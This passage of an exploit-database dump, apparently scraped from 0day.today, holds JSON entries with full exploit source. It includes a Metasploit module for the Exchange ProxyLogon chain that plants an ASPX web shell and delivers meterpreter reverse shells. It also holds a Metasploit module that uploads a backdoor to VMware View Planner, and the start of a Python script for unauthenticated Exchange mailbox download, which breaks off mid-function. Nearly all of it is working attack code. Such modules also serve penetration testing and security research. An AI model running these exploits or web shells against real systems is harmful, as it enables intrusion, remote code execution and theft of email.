bypassing the authentication, impersonating as the\n admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Dicovery (Officially acknowledged by MSRC)\n 'Jang (@testanull)', # Vulnerability analysis + PoC (https://twitter.com/testanull)\n 'mekhalleh (RAMELLA S\u00e9bastien)', # Module author independent researcher (who listen to 'Le Comptoir Secu' and work at Zeop Entreprise)\n 'print(\"\")', # https://www.o2oxy.cn/3169.html\n 'lotusdll' # https://twitter.com/lotusdll/status/1371465073525362691\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['CVE', '2021-27065'],\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'http://aka.ms/exchangevulns'],\n ['URL', 'https://www.praetorian.com/blog/reproducing-proxylogon-exploit'],\n [\n 'URL',\n 'https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265'\n ],\n ['URL', 'https://www.o2oxy.cn/3169.html'],\n ['URL', 'https://github.com/Zeop-CyberSec/proxylogon_writeup']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/exchange_proxylogon',\n 'HttpClientTimeout' => 60,\n 'RPORT' => 443,\n 'SSL' => true,\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Powershell',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_powershell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'AKA' => ['ProxyLogon']\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [true, 'A known email address for this organization']),\n OptEnum.new('METHOD', [true, 'HTTP Method to use for the check', 'POST', ['GET', 'POST']]),\n OptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false])\n ])\n\n register_advanced_options([\n OptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']),\n OptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']),\n OptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']),\n OptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']),\n OptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']),\n OptInt.new('MaxWaitLoop', [true, 'Max counter loop to wait for OAB Virtual Dir reset', 30]),\n OptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0'])\n ])\n end\n\n def cmd_windows_generic?\n datastore['PAYLOAD'] == 'cmd/windows/generic'\n end\n\n def encode_cmd(cmd)\n cmd.gsub!('\\\\', '\\\\\\\\\\\\')\n cmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b')\n end\n\n def execute_command(cmd, _opts = {})\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\"\n send_request_raw(\n 'method' => 'POST',\n 'uri' => normalize_uri(web_directory, @random_filename),\n 'ctype' => 'application/x-www-form-urlencoded',\n 'data' => \"#{@random_inputname}=#{cmd}\"\n )\n end\n\n def install_payload(exploit_info)\n # exploit_info: [server_name, sid, session, canary, oab_id]\n\n input_name = rand_text_alpha(4..8).to_s\n shell = \"http://o/#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{input_name}\\\"],\\\"unsafe\\\");}</script>\"\n data = {\n identity: {\n __type: 'Identity:ECP',\n DisplayName: (exploit_info[4][0]).to_s,\n RawIdentity: (exploit_info[4][1]).to_s\n },\n properties: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n ExternalUrl: shell.to_s\n }\n }\n }.to_json\n\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: exploit_info[2],\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(exploit_info[1]),\n 'msExchTargetMailbox' => patch_sid(exploit_info[1]),\n 'X-vDirObjectId' => (exploit_info[4][1]).to_s\n }\n )\n return '' if response.code != 200\n\n input_name\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def patch_sid(sid)\n ar = sid.to_s.split('-')\n if ar[-1] != '500'\n sid = \"#{ar[0..6].join('-')}-500\"\n end\n\n sid\n end\n\n def random_mapi_id\n id = \"{#{Rex::Text.rand_text_hex(8)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\"\n id.upcase\n end\n\n def random_ssrf_id\n # https://en.wikipedia.org/wiki/2,147,483,647 (lol)\n # max. 2147483647\n rand(1941962752..2147483647)\n end\n\n def request_autodiscover(server_name)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_http(\n 'POST',\n \"#{server_name}/autodiscover/autodiscover.xml?a=~#{random_ssrf_id}\",\n data: soap_autodiscover,\n ctype: 'text/xml; charset=utf-8'\n )\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty?\n\n server = ''\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n end\n fail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty?\n\n [server, legacy_dn]\n end\n\n # https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff\n def request_mapi(server_name, legacy_dn, server_id)\n data = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\n headers = {\n 'X-RequestType' => 'Connect',\n 'X-ClientInfo' => random_mapi_id,\n 'X-ClientApplication' => datastore['MapiClientApp'],\n 'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\"\n }\n\n sid = ''\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{server_name}:444/mapi/emsmdb?MailboxId=#{server_id}&a=~#{random_ssrf_id}\",\n data: data,\n ctype: 'application/mapi-http',\n headers: headers\n )\n if response.code == 200\n sid_regex = /S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/\n\n sid = response.body.match(sid_regex).to_s\n end\n fail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty?\n\n sid\n end\n\n def request_oab(server_name, sid, session, canary)\n data = {\n filter: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n SelectedView: '',\n SelectedVDirType: 'OAB'\n }\n },\n sort: {}\n }.to_json\n\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{server_name}:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=#{canary}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: session,\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(sid),\n 'msExchTargetMailbox' => patch_sid(sid)\n }\n )\n\n if response.code == 200\n data = JSON.parse(response.body)\n data['d']['Output'].each do |oab|\n if oab['Server'].downcase == server_name.downcase\n return [oab['Identity']['DisplayName'], oab['Identity']['RawIdentity']]\n end\n end\n end\n\n []\n end\n\n def request_proxylogon(server_name, sid)\n data = \"<r at=\\\"Negotiate\\\" ln=\\\"#{datastore['EMAIL'].split('@')[0]}\\\"><s>#{sid}</s></r>\"\n session_id = ''\n canary = ''\n\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{server_name}:444/ecp/proxyLogon.ecp?a=~#{random_ssrf_id}\",\n data: data,\n ctype: 'text/xml; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(sid),\n 'msExchTargetMailbox' => patch_sid(sid)\n }\n )\n if response.code == 241\n session_id = response.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\n canary = response.get_cookies.scan(/msExchEcpCanary=([\\w\\-_.]+);*/).flatten[0] # coin coin coin ...\n end\n\n [session_id, canary]\n end\n\n # pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin.\n def run_cve_2021_26855\n # request for internal server name.\n response = send_http(datastore['METHOD'], \"localhost~#{random_ssrf_id}\")\n if response.code != 500 || !response.headers.to_s.include?('X-FEServer')\n fail_with(Failure::NotFound, 'No \\'X-FEServer\\' was found')\n end\n\n server_name = response.headers['X-FEServer']\n print_status(\"Internal server name (#{server_name})\")\n\n # get informations by autodiscover request.\n print_status(message('Sending autodiscover request'))\n server_id, legacy_dn = request_autodiscover(server_name)\n\n print_status(\"Server: #{server_id}\")\n print_status(\"LegacyDN: #{legacy_dn}\")\n\n # get the user UID using mapi request.\n print_status(message('Sending mapi request'))\n sid = request_mapi(server_name, legacy_dn, server_id)\n print_status(\"SID: #{sid} (#{datastore['EMAIL']})\")\n\n # search oab\n sid, session, canary, oab_id = search_oab(server_name, sid)\n\n [server_name, sid, session, canary, oab_id]\n end\n\n # post-auth arbitrary file write.\n def run_cve_2021_27065(session_info)\n # set external url (and set the payload).\n print_status('Prepare the payload on the remote target')\n input_name = install_payload(session_info)\n\n fail_with(Failure::NoAccess, 'Could\\'t prepare the payload on the remote target') if input_name.empty?\n\n # reset the virtual directory (and write the payload).\n print_status('Write the payload on the remote target')\n remote_file = write_payload(session_info)\n\n fail_with(Failure::NoAccess, 'Could\\'t write the payload on the remote target') if remote_file.empty?\n\n # wait a lot.\n i = 0\n while i < datastore['MaxWaitLoop']\n received = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(web_directory, remote_file)\n })\n if received && (received.code == 200)\n break\n end\n\n print_warning(\"Wait a lot (#{i})\")\n sleep 5\n i += 1\n end\n fail_with(Failure::PayloadFailed, 'Could\\'t take the remote backdoor (see. ExchangePathBase option)') if received.code == 302\n\n [input_name, remote_file]\n end\n\n def search_oab(server_name, sid)\n # request cookies (session and canary)\n print_status(message('Sending ProxyLogon request'))\n\n print_status('Try to get a good msExchCanary (by patching user SID method)')\n session_id, canary = request_proxylogon(server_name, patch_sid(sid))\n if canary\n session = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\"\n oab_id = request_oab(server_name, sid, session, canary)\n end\n\n if oab_id.nil? || oab_id.empty?\n print_status('Try to get a good msExchCanary (without correcting the user SID)')\n session_id, canary = request_proxylogon(server_name, sid)\n if canary\n session = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\"\n oab_id = request_oab(server_name, sid, session, canary)\n end\n end\n\n fail_with(Failure::NotFound, 'No \\'ASP.NET_SessionId\\' was found') if session_id.nil? || session_id.empty?\n fail_with(Failure::NotFound, 'No \\'msExchEcpCanary\\' was found') if canary.nil? || canary.empty?\n fail_with(Failure::NotFound, 'No \\'OAB Id\\' was found') if oab_id.nil? || oab_id.empty?\n\n print_status(\"ASP.NET_SessionId: #{session_id}\")\n print_status(\"msExchEcpCanary: #{canary}\")\n print_status(\"OAB id: #{oab_id[1]} (#{oab_id[0]})\")\n\n return [sid, session, canary, oab_id]\n end\n\n def send_http(method, ssrf, opts = {})\n ssrf = \"X-BEResource=#{ssrf};\"\n if opts[:cookie] && !opts[:cookie].empty?\n opts[:cookie] = \"#{ssrf} #{opts[:cookie]}\"\n else\n opts[:cookie] = ssrf.to_s\n end\n\n opts[:ctype] = 'application/x-www-form-urlencoded' if opts[:ctype].nil?\n\n request = {\n 'method' => method,\n 'uri' => @random_uri,\n 'agent' => datastore['UserAgent'],\n 'ctype' => opts[:ctype]\n }\n request = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil?\n request = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil?\n request = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil?\n\n received = send_request_cgi(request)\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def soap_autodiscover\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>#{datastore['EMAIL']}</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n SOAP\n end\n\n def web_directory\n if datastore['UseAlternatePath']\n web_dir = datastore['IISWritePath'].gsub('\\\\', '/')\n else\n web_dir = datastore['ExchangeWritePath'].gsub('\\\\', '/')\n end\n web_dir\n end\n\n def write_payload(exploit_info)\n # exploit_info: [server_name, sid, session, canary, oab_id]\n\n remote_file = \"#{rand_text_alpha(4..8)}.aspx\"\n if datastore['UseAlternatePath']\n remote_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\"\n remote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['IISBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\"\n else\n remote_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\"\n remote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\"\n end\n\n data = {\n identity: {\n __type: 'Identity:ECP',\n DisplayName: (exploit_info[4][0]).to_s,\n RawIdentity: (exploit_info[4][1]).to_s\n },\n properties: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n FilePathName: remote_path.to_s\n }\n }\n }.to_json\n\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: exploit_info[2],\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(exploit_info[1]),\n 'msExchTargetMailbox' => patch_sid(exploit_info[1]),\n 'X-vDirObjectId' => (exploit_info[4][1]).to_s\n }\n )\n return '' if response.code != 200\n\n remote_file\n end\n\n def exploit\n @proto = (ssl ? 'https' : 'http')\n @random_uri = normalize_uri('ecp', \"#{rand_text_alpha(1..3)}.js\")\n\n print_status(message('Attempt to exploit for CVE-2021-26855'))\n exploit_info = run_cve_2021_26855\n\n print_status(message('Attempt to exploit for CVE-2021-27065'))\n shell_info = run_cve_2021_27065(exploit_info)\n\n @random_inputname = shell_info[0]\n @random_filename = shell_info[1]\n\n print_good(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\")\n if datastore['UseAlternatePath']\n remote_file = \"#{datastore['IISBasePath']}\\\\#{datastore['IISWritePath']}\\\\#{@random_filename}\"\n else\n remote_file = \"#{datastore['ExchangeBasePath']}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\\\\#{@random_filename}\"\n end\n register_files_for_cleanup(remote_file)\n\n # trigger powa!\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n if !cmd_windows_generic?\n execute_command(payload.encoded)\n else\n response = execute_command(\"cmd /c #{payload.encoded}\")\n\n print_warning('Dumping command output in response')\n output = response.body.split('Name :')[0]\n if output.empty?\n print_error('Empty response, no command output')\n return\n end\n print_line(output)\n end\n when :windows_dropper\n execute_command(generate_cmdstager(concat_operator: ';').join)\n when :windows_powershell\n cmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)\n execute_command(cmd)\n end\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36024", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-21T21:20:59", "description": "This Metasploit module exploits an unauthenticated log file upload within the log_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6 Security Patch 1. Successful exploitation will result in remote code execution as the apache user inside the appacheServer Docker container.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-19T00:00:00", "type": "zdt", "title": "VMware View Planner 4.6 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2021-03-19T00:00:00", "id": "1337DAY-ID-35998", "href": "https://0day.today/exploit/description/35998", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware View Planner Unauthenticated Log File Upload RCE',\n 'Description' => %q{\n This module exploits an unauthenticated log file upload within the\n log_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6\n Security Patch 1.\n\n Successful exploitation will result in RCE as the apache user inside\n the appacheServer Docker container.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'wvu', # Analysis and PoC\n 'Grant Willcox' # Metasploit Module\n ],\n 'References' => [\n ['CVE', '2021-21978'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0003.html'],\n ['URL', 'https://attackerkb.com/assessments/fc456e03-adf5-409a-955a-8a4fb7e79ece'] # wvu's PoC\n ],\n 'DisclosureDate' => '2021-03-02', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Privileged' => false,\n 'Platform' => 'python',\n 'Targets' => [\n [\n 'VMware View Planner 4.6.0',\n {\n 'Arch' => ARCH_PYTHON,\n 'Type' => :linux_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_tcp'\n }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'wsgi_log_upload', 'log_upload_wsgi.py')\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n unless res.code == 200 && !res.body.empty?\n return CheckCode::Safe('log_upload_wsgi.py file not found at the expected location.')\n end\n\n @original_content = res.body # If the server responded with the contents of log_upload_wsgi.py, lets save this for later restoration.\n\n if res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode(\"utf8\")).hexdigest()==secret_key:')\n return CheckCode::Safe(\"Target's log_upload_wsgi.py file has been patched.\")\n end\n\n CheckCode::Appears('Vulnerable log_upload_wsgi.py file identified!')\n end\n\n # We need to upload a file twice: once for uploading the backdoor, and once for restoring the original file.\n # As the code for both is the same, minus the content of the file, this is a generic function to handle that.\n def upload_file(content)\n mime = Rex::MIME::Message.new\n mime.add_part(content, 'application/octet-stream', nil, \"form-data; name=\\\"logfile\\\"; filename=\\\"#{Rex::Text.rand_text_alpha(20)}\\\"\")\n mime.add_part('{\"itrLogPath\":\"/etc/httpd/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\"}', nil, nil, 'form-data; name=\"logMetaData\"')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'logupload'),\n 'ctype' => \"multipart/form-data; boundary=#{mime.bound}\",\n 'data' => mime.to_s\n )\n unless res.to_s.include?('File uploaded successfully.')\n fail_with(Failure::UnexpectedReply, \"Target indicated that the file wasn't uploaded successfully!\")\n end\n end\n\n def exploit\n # Here we want to grab our template file, taken from a clean install but\n # with a backdoor section added to it, and then fill in the PAYLOAD placeholder\n # with the payload we want to execute.\n data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)\n file_content = File.read(File.join(data_dir, 'log_upload_wsgi.py'))\n\n payload.encoded.gsub!(/\"/, '\\\\\"')\n file_content['PAYLOAD'] = payload.encoded\n\n # Now that things are primed, upload the file to the target.\n print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')\n upload_file(file_content)\n print_good('Backdoor uploaded!')\n\n # Use the OPTIONS request to trigger the backdoor. Technically this\n # could be any other method including invalid ones like BACKDOOR, but for\n # the purposes of stealth lets use a legitimate one.\n print_status('Sending request to execute the backdoor!')\n send_request_cgi(\n 'method' => 'OPTIONS',\n 'uri' => normalize_uri(target_uri.path, 'logupload')\n )\n ensure\n # At this point we should have our shell after waiting a few seconds,\n # so lets now restore the original file so we don't leave anything behind.\n print_status('Reuploading the original code to remove the backdoor!')\n upload_file(@original_content)\n print_good('Original file restored, enjoy the shell!')\n end\nend\n", "sourceHref": "https://0day.today/exploit/35998", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-08T14:23:56", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-18T00:00:00", "type": "zdt", "title": "Microsoft Exchange 2019 - Unauthenticated Email Download Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-05-18T00:00:00", "id": "1337DAY-ID-36262", "href": "https://0day.today/exploit/description/36262", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download\n# Exploit Author: Gonzalo Villegas a.k.a Cl34r\n# Vendor Homepage: https://www.microsoft.com/\n# Version: OWA Exchange 2013 - 2019\n# Tested on: OWA 2016\n# CVE : CVE-2021-26855\n# Details: checking users mailboxes and automated downloads of emails\n\nimport requests\nimport argparse\nimport time\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n__proxies__ = {\"http\": \"http://127.0.0.1:8080\",\n \"https\": \"https://127.0.0.1:8080\"} # for debug on proxy\n\n\n# needs to specifies mailbox, will return folder Id if account exists\npayload_get_folder_id = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetFolder>\n <m:FolderShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:FolderShape>\n <m:FolderIds>\n <t:DistinguishedFolderId Id=\"inbox\">\n <t:Mailbox>\n <t:EmailAddress>{}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:FolderIds>\n </m:GetFolder>\n </soap:Body>\n </soap:Envelope>\n\n\"\"\"\n# needs to specifies Folder Id and ChangeKey, will return a list of messages Ids (emails)\npayload_get_items_id_folder = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:FindItem Traversal=\"Shallow\">\n <m:ItemShape>\n <BaseShape>AllProperties</BaseShape></m:ItemShape>\n <SortOrder/>\n <m:ParentFolderIds>\n <t:FolderId Id=\"{}\" ChangeKey=\"{}\"/>\n </m:ParentFolderIds>\n <QueryString/>\n </m:FindItem>\n </soap:Body>\n</soap:Envelope>\n\"\"\"\n\n# needs to specifies Id (message Id) and ChangeKey (of message too), will return an email from mailbox\npayload_get_mail = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <GetItem xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" Traversal=\"Shallow\">\n <ItemShape>\n <t:BaseShape>Default</t:BaseShape>\n </ItemShape>\n <ItemIds>\n <t:ItemId Id=\"{}\" ChangeKey=\"{}\"/>\n </ItemIds>\n </GetItem>\n </soap:Body>\n </soap:Envelope>\n\"\"\"\n\n\ndef getFQDN(url):\n print(\"[*] Getting FQDN from headers\")\n rs = requests.post(url + \"/owa/auth.owa\", verify=False, data=\"evildata\")\n if \"X-FEServer\" in rs.headers:\n return rs.headers[\"X-FEServer\"]\n 